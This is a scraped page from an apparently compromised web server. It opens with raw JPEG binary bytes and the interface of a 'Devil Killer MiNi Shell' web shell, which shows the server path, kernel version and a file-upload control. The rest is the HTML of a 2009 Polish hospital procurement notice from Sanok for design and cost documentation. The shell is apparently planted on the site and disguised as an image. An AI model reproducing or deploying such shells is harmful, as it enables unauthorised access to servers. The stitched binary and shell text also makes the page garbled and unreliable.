JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090729/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090729/257352-N-2009.html

<p class="kh_header"><b>Sanok: Modernizacja SPZOZ w Sanoku- alokacja Oddziału Kardiologii w zakresie wykonania dokumentacji projektowo-kosztorysowej dotyczącej remontu magazynów Apteki Szpitalnej  oraz zagospodarowania budynku utylizatora na potrzeby pomieszczeń dezynfektora (IV).</b><br>
<b>Numer ogłoszenia: 257352 - 2009; data zamieszczenia: 29.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. 800-lecia 26, 38-500 Sanok, woj. podkarpackie, tel. 013 4656290, faks 013 4656290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zozsanok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja SPZOZ w Sanoku- alokacja Oddziału Kardiologii w zakresie wykonania dokumentacji projektowo-kosztorysowej dotyczącej remontu magazynów Apteki Szpitalnej  oraz zagospodarowania budynku utylizatora na potrzeby pomieszczeń dezynfektora (IV)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.Przedmiotem zamówienia jest usługa opracowania dokumentacji projektowo-kosztorysowej w zakresie następujących zadań: 
zadanie nr 1 - opracowanie dokumentacji projektowo-kosztorysowej dotyczącej remontu 			      magazynów  Apteki szpitalnej SPZOZ w Sanoku
       zadanie nr 2 - opracowanie dokumentacji projektowo-kosztorysowej dotyczącej             		                   zagospodarowania budynku utylizatora  na potrzeby pomieszczeń dezynfektora

Zamawiający dopuszcza składanie ofert częściowych, gdzie część stanowi poszczególne zadanie opisane w lit. A w punkcie od 1 do 2.

B.Dokumentacja opisana w lit. A. obejmować będzie sporządzenie projektów budowlano - wykonawczych wraz z kosztorysami i wymaganą w tym zakresie dokumentacją formalno-prawną, tj. uzyskanie wymaganych prawem: opinii, uzgodnień i pozwoleń w szczególności prawomocnej decyzji umożliwiającej podjęcie robót budowlanych, wydanej przez właściwy organ administracji państwowej.
C.Wspólny słownik zamówień:
71.22.00.00 -6 usługi projektowania architektonicznego.   
D.Opis szczegółowy poszczególnych części zamówienia:
Zadanie nr 1
Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej dotyczącej remontu magazynów Apteki SPZOZ w Sanoku.
I. Dokumentacja projektowo - kosztorysowa niezbędna do zrealizowania zadania inwestycyjnego powinna składać się z następujących opracowań:
1. Wykonanie dokumentacji inwentaryzacyjnej,
2. Wykonanie dokumentacji budowlanej i wykonawczej z podziałem na branże (wentylacji z klimatyzacją - w oparciu o obowiązujące w tym zakresie przepisy, elektryczną, wod- kan i c.o. lub inne wynikające z przepisów) spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120/03, poz. 1133 z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.) wraz ze wszystkimi decyzjami, pozwoleniami, uzgodnieniami, opiniami, i
sprawdzeniami których obowiązek uzyskania wynika z przepisów,
3. Wykonanie kosztorysu inwestorskiego zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130/04 poz. 1389),
4. Wykonanie przedmiaru robót zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
5. Wykonanie specyfikacji technicznej wykonania i odbioru robót dla wszystkich branż                        i spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
6. Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności czy zakres robót obejmuje jeden z rodzajów robót wymienionych w art.21 ust.2 ustawy Prawo budowlane. Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. nr 120, poz.1126).
Zadania nr 2 
Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej dotyczącej zagospodarowania budynku utylizatora na potrzeby pomieszczeń dezynfektora
I. Dokumentacja projektowo - kosztorysowa niezbędna do zrealizowania zadania inwestycyjnego powinna składać się z następujących opracowań:
1. Wykonanie dokumentacji inwentaryzacyjnej,
2. Wykonanie dokumentacji budowlanej i wykonawczej z podziałem na branże (wentylacji, elektryczną, wod- kan, c.o., pary) spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120/03, poz. 1133 z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.) wraz ze wszystkimi decyzjami, pozwoleniami, uzgodnieniami, opiniami, i sprawdzeniami których obowiązek uzyskania wynika z przepisów,
3. Wykonanie kosztorysu inwestorskiego zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130/04 poz. 1389),
4. Wykonanie przedmiaru robót zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
5. Wykonanie specyfikacji technicznej wykonania i odbioru robót dla wszystkich branż i spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r.
w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
6. Informację dotyczącą bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego, uwzględnianą w planie bezpieczeństwa i ochrony zdrowia ze wskazaniem w szczególności czy zakres robót obejmuje jeden z rodzajów robót wymienionych w art.21 ust.2 ustawy Prawo budowlane. Informacja winna uwzględniać warunki Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. nr 120, poz.1126).

E.W dokumentacji należy rozwiązać problem zawilgocenia ścian i podać technologię ich osuszenia.
F. Wykonawca w imieniu Zamawiającego uzyska decyzję - pozwolenie na budowę.
G. Dokumentacja ( wszystkie opracowania ) powinna być sporządzona:
- w formie graficznej papierowej : dokumentacja projektowa budowlano-wykonawcza po 5 egz., przedmiary, kosztorysy inwestorskie, obliczenia, specyfikacje techniczne wykonania i odbioru robót - po 2 egz.
                   -   w formie zapisu elektronicznego w jednym egzemplarzu w następujących formatach:     
                        tekst w formacie pdf. i doc., rysunki w formacie pdf. i dwg.
H.Dokumentacja projektowa musi być opracowana w sposób zgodny z ustaleniami określonymi w   
    miejscowym planie zagospodarowania przestrzennego oraz wymaganiami:
a) ustawy z dnia 7 lipca 1994 Prawo budowlane (tekst jednolity Dz.U. z 2000 r. nr 106, poz.1126 z późn. zm.)
b) ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity: Dz. 	U. z 07. Nr 223, poz.1655),
c) rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 21 września 1992 r. w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej ( Dz. U. Nr 74 poz.366 z późn. zm.)
            Rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków    
            technicznych , jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. Nr 75 poz.690    
            z późn. zm.)
I. Dokumentacja projektowa powinna opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane (podane w obwieszczeniach Prezesa Polskiego Komitetu Normalizacyjnego w sprawie wykazu norm zharmonizowanych, M.P. z 2003r. nr 46, poz.693, z 2004r. nr 7, poz.117 i nr 17, poz.297). W przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane uwzględnia się:
	1) europejskie aprobaty techniczne;
	2) wspólne specyfikacje techniczne;
	3) Polskie Normy przenoszące normy europejskie;
	4) normy państw członkowskich Unii Europejskiej przenoszące europejskie normy 	zharmonizowane;
	5) Polskie Normy wprowadzające normy międzynarodowe;
	6) Polskie Normy;
	      7) polskie aprobaty techniczne.
J.Prace projektowe oraz kosztorysowe należy wykonać siłami własnymi lub w systemie generalnego wykonawstwa - zgodnie z obowiązującymi przepisami, normami oraz zasadami wiedzy technicznej.

K. Rozwiązania projektowe, technologiczne, przyjęte materiały muszą spełniać wymagania stawiane obiektom służby zdrowia, wynikające między innymi z przepisów resortowych.

L. Zamawiający zastrzega sobie prawo, wprowadzenia zmian oraz bieżącego uzgadniania rozwiązań technicznych w okresie realizacji przedmiotu zamówienia.

2. Warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym integralną część SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:      
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy    nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wy­konania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3. znajdują się w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie Zamówienia
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia, 
5. Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:

5.1. Wykonawca musi wykazać, w formie załączonego do oferty oświadczenia z podaniem nazwy i danych zleceniodawcy, zakresu zamówienia, terminów wykonania oraz wartości, potwierdzonego stosownym dokumentem uprzedniego zleceniodawcy o należytym wykonaniu zamówienia, że w ciągu ostatnich 3 lat, a w przypadku, gdy okres prowadzenia działalności jest krótszy w tym okresie, licząc wstecz od dnia wszczęcia postępowania o udzielenie zamówienia, wykonał, tj. zrealizował co najmniej jedną usługę o wartości co najmniej 8 000,00 zł. brutto dla poszczególnego zadania, polegające na opracowaniu dokumentacji projektowo - kosztorysowej. W razie składania oferty na dwa zadania w niniejszym przetargu dopuszczalnym jest wykazanie jednej usługi o wartości co najmniej 16 000,00 zł. brutto, polegające na opracowaniu dokumentacji projektowo - kosztorysowej. 
5.2.Wykonawca musi wykazać, że dysponuje osobami zdolnymi do wykonania zamówienia, poprzez załączenie listy osób i 
lub podmiotów, które będą wykonywać zamówienie lub przewidzianych do jego realizacji we wszystkich branżach projektowych odpowiadających przedmiotowi zamówienia, wraz z potwierdzonymi za zgodność kopiami ich uprawnień właściwymi dla funkcji, które mają pełnić oraz z kopiami wpisów w zakresie ich przynależności do właściwych Izb Zawodowych.
Dodatkowo jeśli w wykazie, o którym mowa powyżej wykonawca wskazał osoby, którymi będzie dysponował,Wykonawca musi przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, zgodnie z wymogami dla tych osób i w zakresie podanym powyżej.  
5.3. Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w zakresie projektowania architektonicznego na kwotę nie niższą niż        10 000,00 zł. 
5.4.Wykonawca zaoferuje 30 dniowy termin płatności licząc od daty wystawiania prawidłowej faktury VAT. 
Sposób oceny: Warunki podane w pkt. 1),2),3),4),5.1),5.2),5.3),5.4) zostaną ocenione w systemie spełnia - nie spełnia  na podstawie przedłożonych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Druki, które należy wypełnić i podpisać (wyłącznie przez osoby uprawnione               do reprezentowania firmy), załączyć do oferty:
a)Formularz ofertowy - zał. nr 1
b)Oświadczenie zgodne z wymogami art. 22 Ustawy - zał. nr 2
c)Parafowany wzór umowy- zał. Nr 3-fakultatywnie
d)Informacja (wykaz) o podwykonawcach (wzór zawiera zał.nr.4 do siwz) [gdy dotyczy]
2. Oświadczenia oraz dokumenty, które należy złożyć w oryginałach, ewentualnie w odpisach lub kserokopiach poświadczonych za zgodność z oryginałem przez Wykonawcę (osoba-osoby uprawniona-e do reprezentowania firmy):
W przypadku podmiotów ubiegających się wspólnie o udzielenie zamówienia (konsorcjum, spółki   cywilnej), każdy z wykonawców wchodzących w skład konsorcjum lub wspólników spółki cywilnej musi udokumentować spełnianie warunków o jakich mowa w części X SIWZ. tj. posiadanie uprawnień do wykonywania określonej działalności lub czynności i nie podlegania wykluczeniu          z postępowania.  Przy ocenie spełniania warunków, o których mowa w art. 22 ust. 1 pkt. 2 i 3 ustawy Pzp, będzie brany pod uwagę łączny potencjał  techniczny i kadrowy wykonawców, ich łączne kwalifikacje, doświadczenie oraz łączna sytuacja ekonomiczna i finansowa. Dopuszcza się możliwość składania wspólnych oświadczeń wykonawców wspólnie ubiegających się o udzielenie zamówienia potwierdzających, że razem spełniają warunki udziału w postępowaniu.
2.1) Oświadczenie o spełnianiu warunków określonych przepisami art. 22 ust.1 ustawy Prawo zamówień publicznych oraz o niepodleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy oraz o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy pzp
2.2) wymagane dokumenty na potwierdzenie, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych: 
a) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
W przypadku podmiotów wspólnie ubiegających sie o udzielenie zamówienia (konsorcjum, spółka cywilna):  
 - należy przedłożyć oryginał pełnomocnictwa (pełnomocnictw) udzielonego (y-ch) przez wszystkich wspólników spółki cywilnej lub przez wszystkich członków konsorcjum do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia - jeżeli wspólną ofertę składają podmioty prowadzące działalność w formie spółki cywilnej lub powołano konsorcjum dla wykonania zamówienia  (zgodnie z art. 23 ust. 2 pzp). Umocowanie może także wynikać z treści umowy konsorcjum lub treści umowy spółki cywilnej 
2.3) wymagane dokumenty na potwierdzenie opisanego przez zamawiającego warunku
znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia:
a) polisa, a w przypadku jej braku inny dokument potwierdzający, ze wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności..
2.4)  wymagane dokumenty na potwierdzenie opisanego przez zamawiającego warunku posiadania przez wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a) wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia,a także zakresu wykonywanych przez nie czynności.
Jeżeli w wykazie , o którym mowa powyżej wykonawca wskazał osoby, którymi będzie dysponował, wykonawca przedkłada także pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.  
b) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia.
2.6) Wymagane dokumenty na potwierdzenie, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego:
Zamawiający nie wymaga przedstawienia dokumentów na potwierdzenie spełniania tego warunku.
2.7) WYKONAWCA zamieszkały poza terytorium Rzeczpospolitej Polskiej:a) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.2 a) składa odpowiedni dokument lub dokumenty, wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów  z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U.z 2006 r.,  Nr 87, poz. 605) wraz ze zmianami wprowadzonymi Rozporządzeniem Prezesa Rady ministrów  dnia 16 października 2008 r. zmieniającym rozporządzenie w sprawie dokumentów jakich może żadać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (DZ. U.  Z 2008 nr 188 poz. 1155)  tj. dokumenty potwierdzające, że:
nie otwarto jego likwidacji ani nie ogłoszono jego upadłości (wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
Powyższe dokumenty winny być złożone wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozsanok.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Sanoku ul. 800- lecia 26, 38-500 Sanok, Budynek Administracji pok. nr 15.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2009 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Sanoku ul. 800- lecia 26, 38-500 Sanok, Budynek Administracji -Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opracowanie dokumentacji projektowo-kosztorysowej dotyczącej remontu magazynów  Apteki szpitalnej SPZOZ w Sanoku.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowo - kosztorysowej dotyczącej remontu magazynów Apteki SPZOZ w Sanoku.
I. Dokumentacja projektowo - kosztorysowa niezbędna do zrealizowania zadania inwestycyjnego powinna składać się z następujących opracowań:
1. Wykonanie dokumentacji inwentaryzacyjnej,
2. Wykonanie dokumentacji budowlanej i wykonawczej z podziałem na branże (wentylacji z klimatyzacją - w oparciu o obowiązujące w tym zakresie przepisy, elektryczną, wod- kan i c.o. lub inne wynikające z przepisów) spełniających wymagania rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. Nr 120/03, poz. 1133 z późn. zm.) oraz rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.) wraz ze wszystkimi decyzjami, pozwoleniami, uzgodnieniami, opiniami, i
sprawdzeniami których obowiązek uzyskania wynika z przepisów,
3. Wykonanie kosztorysu inwestorskiego zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. Nr 130/04 poz. 1389),
4. Wykonanie przedmiaru robót zawierającego wszystkie branże i spełniający wymagania rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202/04, poz. 2072 z późn. zm.),
